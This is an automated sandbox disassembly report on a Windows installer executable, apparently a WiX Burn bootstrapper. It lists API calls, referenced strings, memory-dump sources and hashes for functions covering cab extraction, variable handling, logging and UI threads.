Control-flow Graph: function at 5cc28f (legend: Executed / Not Executed)
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,005CC47F,005C5405,?,?,005C5445), ref: 005CC2D6
• GetLastError.KERNEL32(?,005CC47F,005C5405,?,?,005C5445,005C5445,00000000,?,00000000), ref: 005CC2E7
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,005CC47F,005C5405,?,?,005C5445,005C5445,00000000,?), ref: 005CC336
• GetCurrentProcess.KERNEL32(000000FF,00000000,?,005CC47F,005C5405,?,?,005C5445,005C5445,00000000,?,00000000), ref: 005CC33C
• DuplicateHandle.KERNELBASE(00000000,?,005CC47F,005C5405,?,?,005C5445,005C5445,00000000,?,00000000), ref: 005CC33F
• GetLastError.KERNEL32(?,005CC47F,005C5405,?,?,005C5445,005C5445,00000000,?,00000000), ref: 005CC349
• SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,005CC47F,005C5405,?,?,005C5445,005C5445,00000000,?,00000000), ref: 005CC39B
• GetLastError.KERNEL32(?,005CC47F,005C5405,?,?,005C5445,005C5445,00000000,?,00000000), ref: 005CC3A5
Strings
Memory Dump Source
• Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
Similarity
• API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
• String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
• API String ID: 2619879409-373955632
• Opcode ID: ab70956721e0a814e96e943eade4e6aeb614c28fe854b66e1d6268a6a0581af4
• Instruction ID: 5f3872b5fed861f540336f9fa992cfd92bb0651d482225fc7b08f2e93164d5c9
• Opcode Fuzzy Hash: ab70956721e0a814e96e943eade4e6aeb614c28fe854b66e1d6268a6a0581af4
• Instruction Fuzzy Hash: 8E41B976180241AFDB219F999C49F5B7FA6FBC5B20F21C91DF9189B281D771C801DBA0

Control-flow Graph: function at 602af7 (legend: Executed / Not Executed)
APIs
  • Part of subcall function 005C3838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C3877
  • Part of subcall function 005C3838: GetLastError.KERNEL32 ref: 005C3881
  • Part of subcall function 00604A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00604A9D
• GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00602B41
• GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00602B61
• GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00602B81
• GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00602BA1
• GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00602BC1
• GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00602BE1
• GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00602C01
Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$ErrorLast$DirectorySystem
                                                                                                                                                                                                                                                                                                  • String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                                                                                                                                                                                                                                                                  • API String ID: 2510051996-1735120554

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00603609,00000000,?,00000000), ref: 00603069
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,005EC025,?,005C5405,?,00000000,?), ref: 00603075
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006030B5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006030C1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 006030CC
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006030D6
                                                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(0062B6B8,00000000,00000001,0060B818,?,?,?,?,?,?,?,?,?,?,?,005EC025), ref: 00603111
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 006031C0
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                                                                                                                                                                                                                                                                  • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2124981135-499589564

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,005CC3EB,?,00000000,?,005CC47F), ref: 005E1778
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005CC3EB,?,00000000,?,005CC47F,005C5405,?,?,005C5445,005C5445,00000000,?,00000000), ref: 005E1781
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateErrorEventLast
                                                                                                                                                                                                                                                                                                  • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 545576003-938279966

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 005FFCD6
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(SystemFunction041), ref: 005FFCE8
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 005FFD2B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 005FFD3F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 005FFD77
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 005FFD8B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$ErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4214558900-3191127217
                                                                                                                                                                                                                                                                                                  • Opcode ID: 84f7c46bf78c292b6f90e3728d3c80f52f433aa84425d4a79d4dafe41093b298
                                                                                                                                                                                                                                                                                                  • Instruction ID: 80ccdda3a53e04b80fae32fb414ee2dbccdd4d1d1920e4b905c04aa321aa61b7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84f7c46bf78c292b6f90e3728d3c80f52f433aa84425d4a79d4dafe41093b298
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16216232981A3A9AC7319F55BD0572A6E92FF00B50F067135BE00FE661E7789C019FA4
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 005E08F2
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 005E090A
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 005E090F
                                                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 005E0912
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 005E091C
                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 005E098B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 005E0998
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • <the>.cab, xrefs: 005E08EB
                                                                                                                                                                                                                                                                                                  • Failed to add virtual file pointer for cab container., xrefs: 005E0971
                                                                                                                                                                                                                                                                                                  • Failed to duplicate handle to cab container., xrefs: 005E094A
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 005E0940, 005E09BC
                                                                                                                                                                                                                                                                                                  • Failed to open cabinet file: %hs, xrefs: 005E09C9
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                                                                                                                                                                                                                                                  • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3030546534-3446344238
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1d7a08dbf53441a6ff85023bba511c444ba8a738be3bfb50ad8e6da7bd00762c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3a4f337cf73bbcc935580920b75975cecb18ef15383d15ecf67ba6d815040ceb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d7a08dbf53441a6ff85023bba511c444ba8a738be3bfb50ad8e6da7bd00762c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57312472982536BBEB215B968C09F9F7E6AFF04760F115111FD44F7292D7A09D4086E0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005D3AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,005D3FB5,feclient.dll,?,00000000,?,?,?,005C4B12), ref: 005D3B42
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,005C4B12,?,?,0060B488,?,00000001,00000000,00000000), ref: 005D404C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseSleep
                                                                                                                                                                                                                                                                                                  • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 2834455192-2673269691
                                                                                                                                                                                                                                                                                                  • Opcode ID: c2b931464498dae2910f38d79025c477bdb3b5091f98eeaa64ab20254eab35d6
                                                                                                                                                                                                                                                                                                  • Instruction ID: e9dc7a6eda8921efc23d8ab3ca11d8ccc9b466fed1f1d18a7ebfa97352f2d944
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2b931464498dae2910f38d79025c477bdb3b5091f98eeaa64ab20254eab35d6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2061B271A00616ABDB359FA8CC4AB6A7FA9FF10340F09455BF901DB350E770DE90DA91
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000001,?,00000000,005C5445,00000006,?,005C82B9,?,?,?,00000000,00000000,00000001), ref: 005C6DC8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C56A9: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,005C6595,005C6595,?,005C563D,?,?,00000000), ref: 005C56E5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C56A9: GetLastError.KERNEL32(?,005C563D,?,?,00000000,?,?,005C6595,?,005C7F02,?,?,?,?,?), ref: 005C5714
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,005C82B9), ref: 005C6F59
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 005C6F6B
                                                                                                                                                                                                                                                                                                  • Unsetting variable '%ls', xrefs: 005C6F15
                                                                                                                                                                                                                                                                                                  • Attempt to set built-in variable value: %ls, xrefs: 005C6E56
                                                                                                                                                                                                                                                                                                  • Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 005C6ED0
                                                                                                                                                                                                                                                                                                  • Setting hidden variable '%ls', xrefs: 005C6E86
                                                                                                                                                                                                                                                                                                  • Setting string variable '%ls' to value '%ls', xrefs: 005C6EED
                                                                                                                                                                                                                                                                                                  • Setting numeric variable '%ls' to value %lld, xrefs: 005C6EFA
                                                                                                                                                                                                                                                                                                  • Failed to insert variable '%ls'., xrefs: 005C6E0D
                                                                                                                                                                                                                                                                                                  • Failed to find variable value '%ls'., xrefs: 005C6DE3
                                                                                                                                                                                                                                                                                                  • Failed to set value of variable: %ls, xrefs: 005C6F41
                                                                                                                                                                                                                                                                                                  • variable.cpp, xrefs: 005C6E4B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                                                                                                                                                                                                                                                                  • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2716280545-445000439
                                                                                                                                                                                                                                                                                                  • Opcode ID: f534a2df149c95e17446b2515e6eabd30e5c0e8c497daafbe0e7faa28dd27caa
                                                                                                                                                                                                                                                                                                  • Instruction ID: ac87d99e26266bd307b9b6d2f35c629fbb7be17d5bd0187ecaa53b1cb262018d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f534a2df149c95e17446b2515e6eabd30e5c0e8c497daafbe0e7faa28dd27caa
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A451C1B1A80225AFDB349F99CC4AF6B3FA9FF95710F11051EF845562C2C275DE40CAA1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • IsWindow.USER32(?), ref: 005C4C64
                                                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005C4C75
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to query registration., xrefs: 005C4BAE
                                                                                                                                                                                                                                                                                                  • Failed while running , xrefs: 005C4C2A
                                                                                                                                                                                                                                                                                                  • Failed to open log., xrefs: 005C4B18
                                                                                                                                                                                                                                                                                                  • Failed to set layout directory variable to value provided from command-line., xrefs: 005C4C06
                                                                                                                                                                                                                                                                                                  • Failed to set registration variables., xrefs: 005C4BDE
                                                                                                                                                                                                                                                                                                  • WixBundleLayoutDirectory, xrefs: 005C4BF5
                                                                                                                                                                                                                                                                                                  • Failed to check global conditions, xrefs: 005C4B49
                                                                                                                                                                                                                                                                                                  • Failed to create the message window., xrefs: 005C4B98
                                                                                                                                                                                                                                                                                                  • Failed to set action variables., xrefs: 005C4BC4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: MessagePostWindow
                                                                                                                                                                                                                                                                                                  • String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
                                                                                                                                                                                                                                                                                                  • API String ID: 3618638489-3051724725
                                                                                                                                                                                                                                                                                                  • Opcode ID: 17fd02f613397e4e4916f91c426f549a892d834cf117365eba4ed739b0b05ebd
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5e4316e1bf7c6ebe43d5d375ccbcd651da4a18a0321ff8f40378df94107b5d9f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17fd02f613397e4e4916f91c426f549a892d834cf117365eba4ed739b0b05ebd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2541073164161BBFCB2A5AA4CC69FBBBE5DFF00754F01561AF800962A0E7A0EC109ED0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,005C548E,?,?), ref: 005DEA9D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005C548E,?,?), ref: 005DEAAA
                                                                                                                                                                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_0001E7B4,?,00000000,00000000), ref: 005DEB03
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005C548E,?,?), ref: 005DEB10
                                                                                                                                                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,005C548E,?,?), ref: 005DEB4B
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,005C548E,?,?), ref: 005DEB6A
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?,?,005C548E,?,?), ref: 005DEB77
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2351989216-3599963359
                                                                                                                                                                                                                                                                                                  • Opcode ID: 502ff29e753541a9036c73bd49676872f5673a3c232d6d78d0d93c025d45b948
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4964a3630c8166c86f9707801db0017ea13705127865dfa0e64886e450f93ed4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 502ff29e753541a9036c73bd49676872f5673a3c232d6d78d0d93c025d45b948
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05317676D4121ABBD720EF9D8D86A9FBEA8FF04750F154167B905FB340E7309E0086A1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,771B2F60,?,?,005C5405,005C53BD,00000000,005C5445), ref: 005E1506
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005E1519
                                                                                                                                                                                                                                                                                                  • GetExitCodeThread.KERNELBASE(0060B488,?), ref: 005E155B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005E1569
                                                                                                                                                                                                                                                                                                  • ResetEvent.KERNEL32(0060B460), ref: 005E15A4
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005E15AE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2979751695-3400260300
                                                                                                                                                                                                                                                                                                  • Opcode ID: d58e4a6ace5d7d8d75c00463472cef79fe1a9f9de07329946ee42b28774bc593
                                                                                                                                                                                                                                                                                                  • Instruction ID: ecdf3c89633e2a5ce08568b31b612bdbbdce5c21b7800e67b77216d7a0c448e6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d58e4a6ace5d7d8d75c00463472cef79fe1a9f9de07329946ee42b28774bc593
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D531D470A41646ABD7149FA68D05BBF7FF9FB44700B10846BF982DA160E730CA409F59
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 005C2E5F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005C2E69
